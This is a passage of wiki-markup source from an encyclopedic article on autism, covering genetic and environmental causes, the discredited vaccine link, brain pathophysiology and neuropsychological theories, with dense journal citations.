pages = 287–304 | year = 2008 | pmid = 18956240 | doi = 10.1007/s11065-008-9076-8 }}</ref><ref name=HappeTime/> [[File:Single Chromosome Mutations.svg|thumb|alt=Three diagrams of chromosome pairs A, B that are nearly identical. 1: B is missing a segment of A. 2: B has two adjacent copies of a segment of A. 3: B's copy of A's segment is in reverse order.|Deletion (1), duplication (2) and inversion (3) are all [[chromosome abnormalities]] that have been implicated in autism.<ref name=Beaudet/>]] Autism has a strong genetic basis, although the [[Heritability of autism|genetics of autism]] are complex and it is unclear whether ASD is explained more by rare [[mutation]]s with major effects, or by rare multigene interactions of common genetic variants.<ref name="Abrahams">{{cite journal | vauthors = Abrahams BS, Geschwind DH | title = Advances in autism genetics: on the threshold of a new neurobiology | journal = [[Nature Reviews Genetics]] | volume = 9 | issue = 5 | pages = 341–55 | year = 2008 | pmid = 18414403 | pmc = 2756414 | doi = 10.1038/nrg2346 }}</ref><ref>{{cite journal | vauthors = Buxbaum JD | title = Multiple rare variants in the etiology of autism spectrum disorders | journal = Dialogues Clin Neurosci | volume = 11 | issue = 1 | pages = 35–43 | year = 2009 | pmid = 19432386 | pmc = 3181906 }}</ref> Complexity arises due to interactions among multiple genes, the environment, and [[epigenetic]] factors which do not change [[DNA]] but are heritable and influence [[gene expression]].<ref name="Rapin">{{cite journal | vauthors = Rapin I, Tuchman RF | title = Autism: definition, neurobiology, screening, diagnosis | journal = [[Pediatr Clin North Am]] | volume = 55 | issue = 5 | pages = 1129–46 | year = 2008 | pmid = 18929056 | doi = 10.1016/j.pcl.2008.07.005 }}</ref> Studies of twins suggest that [[heritability]] is 0.7 for autism and as high as 0.9 for ASD, and siblings of those with autism are about 25 times more likely to be autistic than the general population.<ref name=Geschwind-2009/> However, most of the mutations that increase autism risk have not been identified. Typically, autism cannot be traced to a [[Mendelian]] (single-gene) mutation or to a single [[chromosome abnormality]], and none of the genetic syndromes associated with ASDs have been shown to selectively cause ASD.<ref name=Abrahams/> Numerous candidate genes have been located, with only small effects attributable to any particular gene.<ref name=Abrahams/> The large number of autistic individuals with unaffected family members may result from [[copy number variation]]s—spontaneous [[Deletion (genetics)|deletions]] or [[Gene duplication|duplications]] in genetic material during [[meiosis]].<ref>{{cite journal | vauthors = Cook EH, Scherer SW | title = Copy-number variations associated with neuropsychiatric conditions | journal = Nature | volume = 455 | issue = 7215 | pages = 919–23 | year = 2008 | pmid = 18923514 | doi = 10.1038/nature07458 }}</ref> Hence, a substantial fraction of autism cases may be traceable to genetic causes that are highly heritable but not inherited: that is, the mutation that causes the autism is not present in the parental genome.<ref name="Beaudet">{{cite journal | vauthors = Beaudet AL | title = Autism: highly heritable but not inherited | journal = Nat Med | volume = 13 | issue = 5 | pages = 534–6 | year = 2007 | pmid = 17479094 | doi = 10.1038/nm0507-534 }}</ref> Several lines of evidence point to [[Synapse|synaptic]] dysfunction as a cause of autism.<ref name=Levy/> Some rare mutations may lead to autism by disrupting some synaptic pathways, such as those involved with [[cell adhesion]].<ref name="Betancur">{{cite journal | vauthors = Betancur C, Sakurai T, Buxbaum JD | title = The emerging role of synaptic cell-adhesion pathways in the pathogenesis of autism spectrum disorders | journal = [[Trends Neurosci]] | volume = 32 | issue = 7 | pages = 402–12 | year = 2009 | pmid = 19541375 | doi = 10.1016/j.tins.2009.04.003 }}</ref> Gene replacement studies in mice suggest that autistic symptoms are closely related to later developmental steps that depend on activity in synapses and on activity-dependent changes.<ref name="Walsh">{{cite journal | vauthors = Walsh CA, Morrow EM, Rubenstein JL | title = Autism and brain development | journal = [[Cell (journal)|Cell]] | volume = 135 | issue = 3 | pages = 396–400 | year = 2008 | pmid = 18984148 | pmc = 2701104 | doi = 10.1016/j.cell.2008.10.015 }}</ref> All known [[teratogen]]s (agents that cause [[birth defect]]s) related to the risk of autism appear to act during the first eight weeks from [[Human fertilization|conception]], and though this does not exclude the possibility that autism can be initiated or affected later, there is strong evidence that autism arises very early in development.<ref name="Arndt">{{cite journal | vauthors = Arndt TL, Stodgell CJ, Rodier PM | title = The teratology of autism | journal = [[Int J Dev Neurosci]] | volume = 23 | issue = 2–3 | pages = 189–99 | year = 2005 | pmid = 15749245 | doi = 10.1016/j.ijdevneu.2004.11.001 }}</ref> Exposure to [[air pollution]] during pregnancy, especially [[heavy metal (chemistry)|heavy metals]] and particulates, may increase the risk of autism.<ref>{{cite journal |author=Lyall K, Schmidt RJ, Hertz-Picciotto I |title=Maternal lifestyle and environmental risk factors for autism spectrum disorders |journal=Int J Epidemiol |volume=43 |issue=2 |pages=443–64 |date=April 2014 |pmid=24518932 |doi=10.1093/ije/dyt282 }}</ref> [[Environmental factor]]s that have been claimed to contribute to or exacerbate autism, or may be important in future research, include certain foods, [[infectious disease]]s, [[solvent]]s, [[diesel exhaust]], [[PCBs]], [[phthalates]] and [[phenols]] used in plastic products, [[pesticide]]s, [[brominated flame retardant]]s, [[Ethanol|alcohol]], smoking, [[illicit drug]]s, [[vaccine]]s,<ref name=Newschaffer/> and [[prenatal stress]],<ref>{{cite journal | vauthors = Kinney DK, Munir KM, Crowley DJ, Miller AM | title = Prenatal stress and risk for autism | journal = [[Neurosci Biobehav Rev]] | volume = 32 | issue = 8 | pages = 1519–32 | year = 2008 | pmid = 18598714 | pmc = 2632594 | doi = 10.1016/j.neubiorev.2008.06.004 }}</ref> although no links have been found, and some have been completely disproven. Parents may first become aware of autistic symptoms in their child around the time of a routine vaccination. This has led to unsupported theories blaming [[Vaccine controversy#Vaccine overload|vaccine "overload"]], a [[Thiomersal controversy|vaccine preservative]], or the [[MMR vaccine controversy|MMR vaccine]] for causing autism.<ref name="GerberOffit2009">{{cite journal | vauthors = Gerber JS, Offit PA | title = Vaccines and autism: a tale of shifting hypotheses | journal = Clin Infect Dis | volume = 48 | issue = 4 | pages = 456–61 | year = 2009 | pmid = 19128068 | pmc = 2908388 | doi = 10.1086/596476 | url = http://cid.oxfordjournals.org/content/48/4/456.full | archiveurl = http://web.archive.org/web/20131031043545/http://cid.oxfordjournals.org:80/content/48/4/456.full | archivedate = 31 October 2013 }}</ref> The latter theory was supported by a litigation-funded study that has since been shown to have been "an elaborate fraud".<ref name="WakefieldarticleBMJ">{{cite journal | vauthors = Godlee F, Smith J, Marcovitch H | title = Wakefield's article linking MMR vaccine and autism was fraudulent | journal = [[BMJ]] | volume = 342:c7452 | pages = c7452 | year = 2011 | pmid = 21209060 | doi = 10.1136/bmj.c7452 | url = http://www.bmj.com/content/342/bmj.c7452.full | archiveurl = http://web.archive.org/web/20131111093448/http://www.bmj.com/content/342/bmj.c7452.full | archivedate = 11 November 2013 }}</ref> Although these theories lack convincing scientific evidence and are biologically implausible,<ref name=GerberOffit2009/> parental concern about a potential vaccine link with autism has led to lower rates of [[childhood immunizations]], [[MMR vaccine controversy#Disease outbreaks|outbreaks of previously controlled childhood diseases]] in some countries, and the preventable deaths of several children.<ref name="vaccines">Vaccines and autism: * {{cite journal | vauthors = Doja A, Roberts W | title = Immunizations and autism: a review of the literature | journal = [[Can J Neurol Sci]] | volume = 33 | issue = 4 | pages = 341–6 | year = 2006 | pmid = 17168158 | doi=10.1017/s031716710000528x}} * {{cite journal | vauthors = Gerber JS, Offit PA | title = Vaccines and autism: a tale of shifting hypotheses | journal = [[Clin Infect Dis]] | volume = 48 | issue = 4 | pages = 456–61 | year = 2009 | pmid = 19128068 | pmc = 2908388 | doi = 10.1086/596476 | url = http://cid.oxfordjournals.org/content/48/4/456.full | archiveurl = http://web.archive.org/web/20131031043545/http://cid.oxfordjournals.org:80/content/48/4/456.full | archivedate = 31 October 2013 }} * {{cite journal | vauthors = Gross L | title = A broken trust: lessons from the vaccine–autism wars | journal = PLoS Biol | volume = 7 | issue = 5 | pages = e1000114 | year = 2009 | pmid = 19478850 | pmc = 2682483 | doi = 10.1371/journal.pbio.1000114 }} * {{cite journal | vauthors = Paul R | title = Parents ask: am I risking autism if I vaccinate my children? | journal = [[J Autism Dev Disord]] | volume = 39 | issue = 6 | pages = 962–3 | year = 2009 | pmid = 19363650 | doi = 10.1007/s10803-009-0739-y }} * {{cite journal | vauthors = Poland GA, Jacobson RM | title = The Age-Old Struggle against the Antivaccinationists | journal = N Engl J Med | volume = 364 | pages = 97–9 | date = 13 January 2011 | pmid = 21226573 | doi = 10.1056/NEJMp1010594 | url = http://www.nejm.org/doi/full/10.1056/NEJMp1010594 | archiveurl = http://web.archive.org/web/20140423082318/http://www.nejm.org/doi/full/10.1056/NEJMp1010594 | archivedate = 23 April 2014 }}</ref><ref name="dublin">{{cite journal | vauthors = McBrien J, Murphy J, Gill D, Cronin M, O'Donovan C, Cafferkey MT | title = Measles outbreak in Dublin, 2000 | journal = Pediatr. Infect. Dis. J. | volume = 22 | issue = 7 | pages = 580–4 | year = 2003 | pmid = 12867830 | doi = 10.1097/00006454-200307000-00002 }}</ref> ==Mechanism== Autism's symptoms result from maturation-related changes in various systems of the brain.<!-- ref name=Penn/ --> How autism occurs is not well understood. Its mechanism can be divided into two areas: the [[pathophysiology]] of brain structures and processes associated with autism, and the [[neuropsychological]] linkages between brain structures and behaviors.<ref name="Penn">{{cite journal | vauthors = Penn HE | title = Neurobiological correlates of autism: a review of recent research | journal = Child Neuropsychol | volume = 12 | issue = 1 | pages = 57–79 | year = 2006 | pmid = 16484102 | doi = 10.1080/09297040500253546 }}</ref> The behaviors appear to have multiple pathophysiologies.<ref name=London/> ===Pathophysiology=== [[File:Autismbrain.jpg|thumb|alt=Two diagrams of major brain structures implicated in autism. The upper diagram shows the cerebral cortex near the top and the basal ganglia in the center, just above the amygdala and hippocampus. The lower diagram shows the corpus callosum near the center, the cerebellum in the lower rear, and the brain stem in the lower center.|Autism affects the [[amygdala]], [[cerebellum]], and many other parts of the brain.<ref name=Amaral/>]] Unlike many other brain disorders, such as [[Parkinson's]], autism does not have a clear unifying mechanism at either the molecular, cellular, or systems level; it is not known whether autism is a few disorders caused by mutations converging on a few common molecular pathways, or is (like intellectual disability) a large set of disorders with diverse mechanisms.<ref name="Geschwind">{{cite journal | vauthors = Geschwind DH | title = Autism: many genes, common pathways? | journal = Cell | volume = 135 | issue = 3 | pages = 391–5 | year = 2008 | pmid = 18984147 | pmc = 2756410 | doi = 10.1016/j.cell.2008.10.016 | title. = }}</ref> Autism appears to result from developmental factors that affect many or all functional brain systems,<ref>{{cite journal | vauthors = Müller RA | title = The study of autism as a distributed disorder | journal = Ment Retard Dev Disabil Res Rev | volume = 13 | issue = 1 | pages = 85–95 | year = 2007 | pmid = 17326118 | pmc = 3315379 | doi = 10.1002/mrdd.20141 }}</ref> and to disturb the timing of brain development more than the final product.<ref name="Amaral">{{cite journal | vauthors = Amaral DG, Schumann CM, Nordahl CW | title = Neuroanatomy of autism | journal = Trends Neurosci | volume = 31 | issue = 3 | pages = 137–45 | year = 2008 | pmid = 18258309 | doi = 10.1016/j.tins.2007.12.005 }}</ref> [[Neuroanatomical]] studies and the associations with [[teratogens]] strongly suggest that autism's mechanism includes alteration of brain development soon after conception.<ref name=Arndt/> This anomaly appears to start a cascade of pathological events in the brain that are significantly influenced by environmental factors.<ref>{{cite journal | vauthors = Casanova MF | title = The neuropathology of autism | journal = Brain Pathol | volume = 17 | issue = 4 | pages = 422–33 | year = 2007 | pmid = 17919128 | doi = 10.1111/j.1750-3639.2007.00100.x }}</ref> Just after birth, the brains of children with autism tend to grow faster than usual, followed by normal or relatively slower growth in childhood. It is not known whether early overgrowth occurs in all children with autism. It seems to be most prominent in brain areas underlying the development of higher cognitive specialization.<ref name=Geschwind-2009/> Hypotheses for the cellular and molecular bases of pathological early overgrowth include the following: * An excess of [[neuron]]s that causes local overconnectivity in key brain regions.<ref>{{cite journal | vauthors = Courchesne E, Pierce K, Schumann CM, Redcay E, Buckwalter JA, Kennedy DP, Morgan J | title = Mapping early brain development in autism | journal = Neuron | volume = 56 | issue = 2 | pages = 399–413 | year = 2007 | pmid = 17964254 | doi = 10.1016/j.neuron.2007.10.016 | author. = }}</ref> * Disturbed [[neuronal migration]] during early [[gestation]].<ref name="Schmitz">{{cite journal | vauthors = Schmitz C, Rezaie P | title = The neuropathology of autism: where do we stand? | journal = Neuropathol Appl Neurobiol | volume = 34 | issue = 1 | pages = 4–11 | year = 2008 | pmid = 17971078 | doi = 10.1111/j.1365-2990.2007.00872.x | title. = }}</ref><ref name="Persico">{{cite journal | vauthors = Persico AM, Bourgeron T | title = Searching for ways out of the autism maze: genetic, epigenetic and environmental clues | journal = Trends Neurosci | volume = 29 | issue = 7 | pages = 349–58 | year = 2006 | pmid = 16808981 | doi = 10.1016/j.tins.2006.05.010 }}</ref> * Unbalanced excitatory–inhibitory networks.<ref name=Persico/> * Abnormal formation of [[synapse]]s and [[dendritic spine]]s,<ref name=Persico/> for example, by modulation of the [[neurexin]]–[[neuroligin]] [[Cell adhesion|cell-adhesion]] system,<ref>{{cite journal | vauthors = Südhof TC | title = Neuroligins and neurexins link synaptic function to cognitive disease | journal = Nature | volume = 455 | issue = 7215 | pages = 903–11 | year = 2008 | pmid = 18923512 | pmc = 2673233 | doi = 10.1038/nature07456 }}</ref> or by poorly regulated [[Protein synthesis|synthesis]] of synaptic proteins.<ref>{{cite journal | vauthors = Kelleher RJ, Bear MF | title = The autistic neuron: troubled translation? | journal = Cell | volume = 135 | issue = 3 | pages = 401–6 | year = 2008 | pmid = 18984149 | doi = 10.1016/j.cell.2008.10.017 | title. = }}</ref><ref>{{cite journal | vauthors = Bear MF, Dölen G, Osterweil E, Nagarajan N | title = Fragile X: translation in action. | journal = Neuropsychopharmacology | volume = 33 | issue = 1 | pages = 84–7 | year = 2008 | pmid = 17940551 | doi = 10.1038/sj.npp.1301610 | title. = }}</ref> Disrupted synaptic development may also contribute to [[epilepsy]], which may explain why the two conditions are associated.<ref>{{cite journal | vauthors = Tuchman R, Moshé SL, Rapin I | title = Convulsing toward the pathophysiology of autism | journal = Brain Dev | volume = 31 | issue = 2 | pages = 95–103 | year = 2009 | pmid = 19006654 | pmc = 2734903 | doi = 10.1016/j.braindev.2008.09.009 }}</ref> The [[immune system]] is thought to play an important role in autism. Children with autism have been found by researchers to have [[inflammation]] of both the peripheral and central immune systems as indicated by increased levels of pro-inflammatory [[cytokines]] and significant activation of [[microglia]].<ref name="pmid24290389">{{cite journal | vauthors = Hsiao EY | title = Immune dysregulation in autism spectrum disorder. | journal = International Review of Neurobiology | volume = 113 | pages = 269–302 | year = 2013 | pmid = 24290389 | doi = 10.1016/B978-0-12-418700-9.00009-5 }}</ref><ref name="pmid21906670">{{cite journal | vauthors = Onore C, Careaga M, Ashwood P | title = The role of immune dysfunction in the pathophysiology of autism | journal = Brain, Behavior and Immunity | volume = 26 | issue = 3 | pages = 383–92 | date = August 2011 | pmid = 21906670 | doi = 10.1016/j.bbi.2011.08.007 }}</ref><ref name="pmid24795645">{{cite journal | vauthors = Rossignol DA, Frye RE | title = Evidence linking oxidative stress, mitochondrial dysfunction, and inflammation in the brain of individuals with autism. | journal = Frontiers in Physiology | volume = 5 | page = 150 | year = 2014 | pmid = 24795645 | doi = 10.1016/j.bbi.2011.08.007 }}</ref> Biomarkers of abnormal immune function have also been associated with increased impairments in behaviors that are characteristic of the core features of autism such as deficits in social interactions and communication.<ref name="pmid21906670"/> Interactions between the [[immune system]] and the [[nervous system]] begin early during the [[Human embryogenesis|embryonic stage]] of life, and successful neurodevelopment depends on a balanced immune response. It is thought that activation of a pregnant mother's immune system such as from environmental toxicants or infection can contribute to causing autism through causing a disruption of brain development.<ref name="pmid21482187 ">{{cite journal | vauthors = Patterson PH | title = Maternal infection and immune involvement in autism. | journal = Trends in Molecular Medicine | volume = 17 | issue = 7 | pages = 389–94 | date = July 2011 | pmid = 21482187 | doi = 10.1016/j.molmed.2011.03.001 }}</ref><ref name="Chaste">{{cite journal | vauthors = Chaste P, Leboyer M | title = Autism risk factors: genes, environment, and gene-environment interactions | journal = Dialogues Clin Neurosci | volume = 14 | issue = 3 | pages = 281–92 | year = 2012 | pmid = 23226953 | pmc = 3513682 }}</ref><ref>{{cite journal | vauthors = Ashwood P, Wills S, Van de Water J | title = The immune response in autism: a new frontier for autism research | journal = J Leukoc Biol | volume = 80 | issue = 1 | pages = 1–15 | year = 2006 | pmid = 16698940 | doi = 10.1189/jlb.1205707 | url = http://www.jleukbio.org/cgi/content/full/80/1/1 }}</ref> This is supported by recent studies that have found that infection during pregnancy is associated with an increased risk of autism.<ref name="pmid25218900">{{cite journal | vauthors = Lee BK, Magnusson C, Gardner RM, Blomström S, Newschaffer CJ, Burstyn I, Karlsson H, Dalman C | title = Maternal hospitalization with infection during pregnancy and risk of autism spectrum disorders. | journal = Brain, Behavior and Immunity | date = September 2014 | pmid = 25218900 | doi = 10.1016/j.bbi.2014.09.001 }}</ref><ref name="pmid20414802">{{cite journal | vauthors = Atladóttir HO, Thorsen P, Østergaard L, Schendel DE, Lemcke S, Abdallah M, Parner ET | title = Maternal infection requiring hospitalization during pregnancy and autism spectrum disorders. | journal = Journal of Autism and Developmental Disorders | volume = 40 | issue = 12 | pages = 1423–30. | date = December 2010 | pmid = 20414802 | doi = 10.1007/s10803-010-1006-y }}</ref> The relationship of [[neurochemical]]s to autism is not well understood; several have been investigated, with the most evidence for the role of [[serotonin]] and of genetic differences in its transport.<ref name="Levy">{{cite journal | vauthors = Levy SE, Mandell DS, Schultz RT | title = Autism | journal = Lancet | volume = 374 | issue = 9701 | pages = 1627–38 | year = 2009 | pmid = 19819542 | pmc = 2863325 | doi = 10.1016/S0140-6736(09)61376-3 }}</ref> The role of group I [[metabotropic glutamate receptors]] (mGluR) in the pathogenesis of [[fragile X syndrome]], the most common identified genetic cause of autism, has led to interest in the possible implications for future autism research into this pathway.<ref name="pmid18093519">{{cite journal | vauthors = Dölen G, Osterweil E, Rao BS, Smith GB, Auerbach BD, Chattarji S, Bear MF | title = Correction of fragile X syndrome in mice | journal = Neuron | volume = 56 | issue = 6 | pages = 955–62 | year = 2007 | pmid = 18093519 | pmc = 2199268 | doi = 10.1016/j.neuron.2007.12.001 }}</ref> Some data suggests neuronal overgrowth potentially related to an increase in several [[growth hormone]]s<ref>{{cite journal | vauthors = Hughes JR | title = Update on autism: A review of 1300 reports published in 2008 | journal = Epilepsy Behav | volume = 16 | issue = 4 | pages = 569–589 | year = 2009 | pmid = 19896907 | doi = 10.1016/j.yebeh.2009.09.023 }}</ref> or to impaired regulation of [[growth factor receptor]]s. Also, some [[inborn errors of metabolism]] are associated with autism, but probably account for less than 5% of cases.<ref name=Manzi/> The [[mirror neuron system]] (MNS) theory of autism hypothesizes that distortion in the development of the MNS interferes with imitation and leads to autism's core features of social impairment and communication difficulties. The MNS operates when an animal performs an action or observes another animal perform the same action. The MNS may contribute to an individual's understanding of other people by enabling the modeling of their behavior via embodied simulation of their actions, intentions, and emotions.<ref>MNS and autism: * {{cite journal | vauthors = Williams JH | title = Self–other relations in social development and autism: multiple roles for mirror neurons and other brain bases | journal = Autism Res | volume = 1 | issue = 2 | pages = 73–90 | year = 2008 | pmid = 19360654 | doi = 10.1002/aur.15 }} * {{cite journal | vauthors = Dinstein I, Thomas C, Behrmann M, Heeger DJ | title = A mirror up to nature | journal = Curr Biol | volume = 18 | issue = 1 | pages = R13–8 | year = 2008 | pmid = 18177704 | pmc = 2517574 | doi = 10.1016/j.cub.2007.11.004 }}</ref> Several studies have tested this hypothesis by demonstrating structural abnormalities in MNS regions of individuals with ASD, delay in the activation in the core circuit for imitation in individuals with Asperger syndrome, and a correlation between reduced MNS activity and severity of the syndrome in children with ASD.<ref name="Iacoboni">{{cite journal | vauthors = Iacoboni M, Dapretto M | title = The mirror neuron system and the consequences of its dysfunction | journal = Nature Reviews Neuroscience | volume = 7 | issue = 12 | pages = 942–51 | year = 2006 | pmid = 17115076 | doi = 10.1038/nrn2024 }}</ref> However, individuals with autism also have abnormal brain activation in many circuits outside the MNS<ref>{{cite journal | vauthors = Frith U, Frith CD | title = Development and neurophysiology of mentalizing | journal = Philosophical Transactions of the Royal Society B | volume = 358 | issue = 1431 | pages = 459–73 | year = 2003 | pmid = 12689373 | pmc = 1693139 | doi = 10.1098/rstb.2002.1218 | url = http://rstb.royalsocietypublishing.org/content/358/1431/459.full.pdf | format = PDF }}</ref> and the MNS theory does not explain the normal performance of children with autism on imitation tasks that involve a goal or object.<ref>{{cite journal | vauthors = Hamilton AF | title = Emulation and mimicry for social interaction: a theoretical approach to imitation in autism | journal = Q J Exp Psychol | volume = 61 | issue = 1 | pages = 101–15 | year = 2008 | pmid = 18038342 | doi = 10.1080/17470210701508798 }}</ref> [[File:Powell2004Fig1A.jpeg|thumb|upright|alt=A human brain viewed from above. About 10% is highlighted in yellow and 10% in blue. There is only a tiny (perhaps 0.5%) green region where they overlap.|Autistic individuals tend to use different areas of the brain (yellow) for a movement task compared to a control group (blue).<ref name="Powell">{{cite journal | vauthors = Powell K | title=Opening a window to the autistic brain |journal=PLoS Biol |volume=2 |issue=8 |pages=E267 |year=2004 |pmid=15314667 |pmc=509312 |doi=10.1371/journal.pbio.0020267 |url=http://www.plosbiology.org/article/info:doi/10.1371/journal.pbio.0020267 |archiveurl=http://web.archive.org/web/20130526034145/http://www.plosbiology.org/article/info:doi/10.1371/journal.pbio.0020267 |archivedate=26 May 2013 }}</ref>]] ASD-related patterns of low function and aberrant activation in the brain differ depending on whether the brain is doing social or nonsocial tasks.<ref>{{cite journal | vauthors = Di Martino A, Ross K, Uddin LQ, Sklar AB, Castellanos FX, Milham MP | title = Functional brain correlates of social and nonsocial processes in autism spectrum disorders: an activation likelihood estimation meta-analysis | journal = Biol Psychiatry | volume = 65 | issue = 1 | pages = 63–74 | year = 2009 | pmid = 18996505 | doi = 10.1016/j.biopsych.2008.09.022 }}</ref> In autism there is evidence for reduced functional connectivity of the [[default network]], a large-scale brain network involved in social and emotional processing, with intact connectivity of the [[task-positive network]], used in sustained attention and goal-directed thinking. In people with autism the two networks are not negatively correlated in time, suggesting an imbalance in toggling between the two networks, possibly reflecting a disturbance of [[self-referential]] thought.<ref>{{cite journal | vauthors = Broyd SJ, Demanuele C, Debener S, Helps SK, James CJ, Sonuga-Barke EJ | title = Default-mode brain dysfunction in mental disorders: a systematic review | journal = Neurosci Biobehav Rev | volume = 33 | issue = 3 | pages = 279–96 | year = 2009 | pmid = 18824195 | doi = 10.1016/j.neubiorev.2008.09.002 }}</ref> The underconnectivity theory of autism hypothesizes that autism is marked by underfunctioning high-level neural connections and synchronization, along with an excess of low-level processes.<ref>{{cite journal | vauthors = Just MA, Cherkassky VL, Keller TA, Kana RK, Minshew NJ | title = Functional and anatomical cortical underconnectivity in autism: evidence from an FMRI study of an executive function task and corpus callosum morphometry | journal = Cereb Cortex | volume = 17 | issue = 4 | pages = 951–61 | year = 2007 | pmid = 16772313 | doi = 10.1093/cercor/bhl006 | url = http://cercor.oxfordjournals.org/cgi/content/full/17/4/951 | archiveurl = http://web.archive.org/web/20100707140313/http://cercor.oxfordjournals.org:80/cgi/content/full/17/4/951 | archivedate = 7 July 2010 }}</ref> Evidence for this theory has been found in [[functional neuroimaging]] studies on autistic individuals<ref name="Williams">{{cite journal | vauthors = Williams DL, Goldstein G, Minshew NJ | title = Neuropsychologic functioning in children with autism: further evidence for disordered complex information-processing | journal = Child Neuropsychol | volume = 12 | issue = 4–5 | pages = 279–98 | year = 2006 | pmid = 16911973 | pmc = 1803025 | doi = 10.1080/09297040600681190 }}</ref> and by a [[Electroencephalography|brainwave]] study that suggested that adults with ASD have local overconnectivity in the [[Cerebral cortex|cortex]] and weak functional connections between the [[frontal lobe]] and the rest of the cortex.<ref>{{cite journal | vauthors = Murias M, Webb SJ, Greenson J, Dawson G | title = Resting state cortical connectivity reflected in EEG coherence in individuals with autism | journal = Biol Psychiatry | volume = 62 | issue = 3 | pages = 270–3 | year = 2007 | pmid = 17336944 | pmc = 2001237 | doi = 10.1016/j.biopsych.2006.11.012 }}</ref> Other evidence suggests the underconnectivity is mainly within each [[Cerebral hemisphere|hemisphere]] of the cortex and that autism is a disorder of the [[Association areas|association cortex]].<ref>{{cite journal | vauthors = Minshew NJ, Williams DL | title = The new neurobiology of autism: cortex, connectivity, and neuronal organization | journal = Arch Neurol | volume = 64 | issue = 7 | pages = 945–50 | year = 2007 | pmid = 17620483 | pmc = 2597785 | doi = 10.1001/archneur.64.7.945 }}</ref> From studies based on [[event-related potential]]s, transient changes to the brain's electrical activity in response to stimuli, there is considerable evidence for differences in autistic individuals with respect to attention, orientation to auditory and visual stimuli, novelty detection, language and face processing, and information storage; several studies have found a preference for nonsocial stimuli.<ref>{{cite journal | vauthors = Jeste SS, Nelson CA | title = Event related potentials in the understanding of autism spectrum disorders: an analytical review | journal = J Autism Dev Disord | volume = 39 | issue = 3 | pages = 495–510 | year = 2009 | pmid = 18850262 | doi = 10.1007/s10803-008-0652-9 }}</ref> For example, [[magnetoencephalography]] studies have found evidence in children with autism of delayed responses in the brain's processing of auditory signals.<ref>{{cite journal | vauthors = Roberts TP, Schmidt GL, Egeth M, Blaskey L, Rey MM, Edgar JC, Levy SE | title = Electrophysiological signatures: magnetoencephalographic studies of the neural correlates of language impairment in autism spectrum disorders | journal = Int J Psychophysiol | volume = 68 | issue = 2 | pages = 149–60 | year = 2008 | pmid = 18336941 | pmc = 2397446 | doi = 10.1016/j.ijpsycho.2008.01.012 | author. = }}</ref> In the genetic area, relations have been found between autism and [[schizophrenia]] based on duplications and deletions of chromosomes; research showed that schizophrenia and autism are significantly more common in combination with [[1q21.1 deletion syndrome]]. Research on autism/schizophrenia relations for chromosome 15 (15q13.3), chromosome 16 (16p13.1) and chromosome 17 (17p12) are inconclusive.<ref>{{cite journal | vauthors = Crespi B, Stead P, Elliot M | title = Evolution in health and medicine Sackler colloquium: Comparative genomics of autism and schizophrenia | journal = Proceedings of the National Academy of Sciences of the United States of America | volume = 107 | issue = Suppl 1 | pages = 1736–41 | year = 2010 | pmid = 19955444 | pmc = 2868282 | doi = 10.1073/pnas.0906080106 }}</ref> ===Neuropsychology=== Two major categories of [[cognitive]] theories have been proposed about the links between autistic brains and behavior. The first category focuses on deficits in [[social cognition]]. [[Simon Baron-Cohen]]'s [[empathizing–systemizing theory]] postulates that autistic individuals can systemize—that is, they can develop internal rules of operation to handle events inside the brain—but are less effective at empathizing by handling events generated by other agents. An extension, the extreme male brain theory, hypothesizes that autism is an extreme case of the male brain, defined psychometrically as individuals in whom systemizing is better than empathizing.<ref name=E-S-theory/> These theories are somewhat related to Baron-Cohen's earlier [[theory of mind]] approach, which hypothesizes that autistic behavior arises from an inability to ascribe mental states to oneself and others. The theory of mind hypothesis is supported by the atypical responses of children with autism to the [[Sally–Anne test]] for reasoning about others' motivations,<ref name="E-S-theory">{{cite journal | vauthors = Baron-Cohen S | title = Autism: the empathizing–systemizing (E-S) theory | journal = Annals of the New York Academy of Sciences | volume = 1156 | pages = 68–80 | year = 2009 | pmid = 19338503 | doi = 10.1111/j.1749-6632.2009.04467.x | url = http://docs.autismresearchcentre.com/papers/2009_BC_nyas.pdf | format = PDF | archiveurl = http://web.archive.org/web/20131214134422/http://docs.autismresearchcentre.com/papers/2009_BC_nyas.pdf | archivedate = 14 December 2013 }}</ref> and the mirror neuron system theory of autism described in ''[[#Pathophysiology|Pathophysiology]]'' maps well to the hypothesis.<ref name=Iacoboni/> However, most studies have found no evidence of impairment in autistic individuals' ability to understand other people's basic intentions or goals; instead, data suggests that impairments are found in understanding more complex social emotions or in considering others' viewpoints.<ref>{{cite journal | vauthors = Hamilton AF | title = Goals, intentions and mental states: challenges for theories of autism | journal = J Child Psychol Psychiatry | volume = 50 | issue = 8 | pages = 881–92 | year = 2009 | pmid = 19508497 | doi = 10.1111/j.1469-7610.2009.02098.x }}</ref> The second category focuses on nonsocial or general processing: the [[executive functions]] such as [[working memory]], planning, [[Inhibition Theory|inhibition]]. In his review, Kenworthy states that "the claim of [[executive dysfunction]] as a causal factor in autism is controversial", however, "it is clear that executive dysfunction plays a role in the social and cognitive deficits observed in individuals with autism".<ref name=Kenworthy/> Tests of core executive processes such as eye movement tasks indicate improvement from late childhood to adolescence, but performance never reaches typical adult levels.<ref>{{cite journal | vauthors = O'Hearn K, Asato M, Ordaz S, Luna B | title = Neurodevelopment and executive function in autism | journal = Dev Psychopathol | volume = 20 | issue = 4 | pages = 1103–32 | year = 2008 | pmid = 18838033 | doi = 10.1017/S0954579408000527 }}</ref> A strength of the theory is predicting stereotyped behavior and narrow interests;<ref>{{cite journal | vauthors = Hill EL | title = Executive dysfunction in autism | journal = Trends Cogn Sci | volume = 8 | issue = 1 | pages = 26–32 | year = 2004 | pmid = 14697400 | doi = 10.1016/j.dr.2004.01.001 }}</ref> two weaknesses are that executive function is hard to measure<ref name="Kenworthy">{{cite journal | vauthors = Kenworthy L, Yerys BE, Anthony LG, Wallace GL | title = Understanding executive control in autism spectrum disorders in the lab and in the real world | journal = Neuropsychol Rev | volume = 18 | issue = 4 | pages = 320–38 | year = 2008 | pmid = 18956239 | pmc = 2856078 | doi = 10.1007/s11065-008-9077-7 }}</ref> and that executive function deficits have not been found in young children with autism.<ref name=Sigman/> [[Weak central coherence theory]] hypothesizes that a limited ability to see the big picture underlies the central disturbance in autism. One strength of this theory is predicting special talents and peaks in performance in autistic people.<ref>{{cite journal | vauthors = Happé F, Frith U | title = The weak coherence account: detail-focused cognitive style in autism spectrum disorders | journal = J Autism Dev Disord | volume = 36 | issue = 1 | pages = 5–25 | year = 2006 | pmid = 16450045 | doi = 10.1007/s10803-005-0039-0 }}</ref> A related theory—enhanced perceptual functioning—focuses more on the superiority of locally oriented and [[perceptual]] operations in autistic individuals.<ref>{{cite journal | vauthors = Mottron L, Dawson M, Soulières I, Hubert B, Burack J | title = 